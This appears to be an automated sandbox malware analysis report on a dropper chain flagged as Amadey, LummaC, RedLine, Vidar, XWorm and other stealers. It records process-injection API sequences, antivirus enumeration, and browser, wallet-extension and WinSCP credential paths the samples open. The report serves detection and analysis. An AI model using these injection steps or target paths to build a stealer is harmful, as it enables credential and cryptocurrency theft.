Code function: 10_2_03109875 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

10_2_03109875

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Memory written: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Memory written: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Memory written: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 380000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Memory written: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Memory written: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 380000
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 382000
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 38C000
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 38E000
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 480008

Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe "C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe "C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\mshta.exe	Process created: unknown unknown

Source: b3d465ea47.exe, 00000028.00000002.2841741210.0000000000542000.00000002.00000001.01000000.0000001E.sdmp, b3d465ea47.exe.7.dr, random[1].exe.7.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000007.00000002.3400362659.0000000001023000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00E4D3E2 cpuid

7_2_00E4D3E2

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069375001\G8lVmiI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069375001\G8lVmiI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070034001\G8lVmiI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070034001\G8lVmiI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070036021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070036021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070037001\uniq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070037001\uniq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070040001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070040001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070041001\1VB7gm8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070041001\1VB7gm8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070042001\MvowLGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070042001\MvowLGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070046001\5FheP4L.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070046001\5FheP4L.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070047001\5FheP4L.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070047001\5FheP4L.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070052001\26dddb3c83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070052001\26dddb3c83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070053001\0fc5fe7282.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070053001\0fc5fe7282.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070054001\48967fad90.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070054001\48967fad90.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: uniq.exe, 00000017.00000002.2777710828.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.3398457973.0000000000755000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.3494008212.0000000005373000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 0000001D.00000002.2818476473.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 7.2.skotes.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.random.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2243908073.0000000000E31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2253173379.0000000000E31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2202506621.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: uniq.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: L65uNi1.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.L65uNi1.exe.4109550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.L65uNi1.exe.4109550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.L65uNi1.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\L65uNi1[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\uniq[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7496, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1VB7gm8.exe PID: 2744, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3430741230.0000000002643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MvowLGc.exe PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: L65uNi1.exe, 0000000B.00000002.2694231478.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: af53YGc.exe	String found in binary or memory: Wallets/ElectronCash
Source: af53YGc.exe	String found in binary or memory: window-state.json
Source: af53YGc.exe, 00000010.00000002.2730724980.000000000130F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d"
Source: 1VB7gm8.exe, 00000008.00000003.2991393831.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: af53YGc.exe	String found in binary or memory: %appdata%\Ethereum
Source: L65uNi1.exe, 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
